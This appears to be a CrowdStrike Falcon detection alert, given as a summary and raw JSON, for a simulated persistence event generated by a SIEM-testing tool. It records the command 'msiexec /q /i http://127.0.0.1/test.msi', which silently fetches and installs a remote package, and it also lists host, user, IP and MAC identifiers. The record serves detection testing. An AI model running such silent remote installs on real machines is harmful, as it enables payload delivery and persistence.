High
Process Information
- File Name
msiexec.exe- File Path
\Device\HarddiskVolume3\Windows\System32\msiexec.exe- Command Line
-
msiexec /q /i http://127.0.0.1/test.msi - Process ID
35526602683- Parent PID
35523788042- SHA256
-
677417ba3ad87f73cd95ad30423998c6089e7eef381b309a562cda1eb6fe178eVT - MD5
54de75f1efb2bfb56d4519848a6b04f0- Disposition
-
0
Detection, standard detection.
Raw JSON Data
{
"metadata": {
"customerIDString": "84393bf974fd44bda943a25a6a7bc27f",
"offset": 158149,
"eventType": "EppDetectionSummaryEvent",
"eventCreationTime": 1766358949000,
"version": "1.0"
},
"event": {
"ProcessStartTime": 1766358876,
"ProcessEndTime": 1766358876,
"ProcessId": 35526602683,
"ParentProcessId": 35523788042,
"Hostname": "TEAHEE",
"UserName": "dokji",
"Name": "Attacker Methodology",
"Description": "Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions.",
"Severity": 70,
"SeverityName": "High",
"FileName": "msiexec.exe",
"FilePath": "\\Device\\HarddiskVolume3\\Windows\\System32\\msiexec.exe",
"CommandLine": "msiexec /q /i http://127.0.0.1/test.msi",
"SHA256String": "677417ba3ad87f73cd95ad30423998c6089e7eef381b309a562cda1eb6fe178e",
"MD5String": "54de75f1efb2bfb56d4519848a6b04f0",
"SHA1String": "0000000000000000000000000000000000000000",
"LogonDomain": "TEAHEE",
"FalconHostLink": "https://falcon.us-2.crowdstrike.com/activity-v2/detections/84393bf974fd44bda943a25a6a7bc27f:ind:47186ef241ea495885522e5d4930eda3:35526602683-10564-11361296?_cid=g04000x7oomvbbtvcerklzeap3llo7ue",
"AgentId": "47186ef241ea495885522e5d4930eda3",
"CompositeId": "84393bf974fd44bda943a25a6a7bc27f:ind:47186ef241ea495885522e5d4930eda3:35526602683-10564-11361296",
"LocalIP": "172.27.1.26",
"MACAddress": "e8-84-a5-3f-53-7c",
"Tactic": "Persistence",
"Technique": "Event Triggered Execution",
"Objective": "Keep Access",
"PatternDispositionDescription": "Detection, standard detection.",
"PatternDispositionValue": 0,
"PatternDispositionFlags": {
"Indicator": false,
"Detect": false,
"InddetMask": false,
"SensorOnly": false,
"Rooting": false,
"KillProcess": false,
"KillSubProcess": false,
"QuarantineMachine": false,
"QuarantineFile": false,
"PolicyDisabled": false,
"KillParent": false,
"OperationBlocked": false,
"ProcessBlocked": false,
"RegistryOperationBlocked": false,
"CriticalProcessDisabled": false,
"BootupSafeguardEnabled": false,
"FsOperationBlocked": false,
"HandleOperationDowngraded": false,
"KillActionFailed": false,
"BlockingUnsupportedOrDisabled": false,
"SuspendProcess": false,
"SuspendParent": false,
"ContainmentFileSystem": false
},
"ParentImageFileName": "cmd.exe",
"ParentCommandLine": "\u0022cmd.exe\u0022 /c msiexec /q /i http://127.0.0.1/test.msi",
"GrandParentImageFileName": "MegaGenerator.exe",
"GrandParentCommandLine": "\u0022C:\\app\\cortex-xdr-siem-test\\xdr_tools\\MegaGenerator\\bin\\publish\\MegaGenerator.exe\u0022 --once --scenarios 15 ",
"HostGroups": "4f5aa5f1cdc6441982cf5c58e4b5d75a",
"PatternId": 10564,
"SourceVendors": "CrowdStrike",
"SourceProducts": "Falcon Insight",
"DataDomains": "Endpoint",
"AggregateId": "aggind:47186ef241ea495885522e5d4930eda3:9262541600",
"Type": "ldt",
"ParentImageFilePath": "\\Device\\HarddiskVolume3\\Windows\\System32\\cmd.exe",
"GrandParentImageFilePath": "\\Device\\HarddiskVolume3\\app\\cortex-xdr-siem-test\\xdr_tools\\MegaGenerator\\bin\\publish\\MegaGenerator.exe",
"LocalIPv6": "",
"PlatformId": "0",
"PlatformName": "Windows",
"MitreAttack": [
{
"Tactic": "Persistence",
"TacticID": "TA0003",
"Technique": "Event Triggered Execution",
"TechniqueID": "T1546",
"PatternID": 10564
}
],
"CloudIndicator": false,
"RiskScore": 65
}
}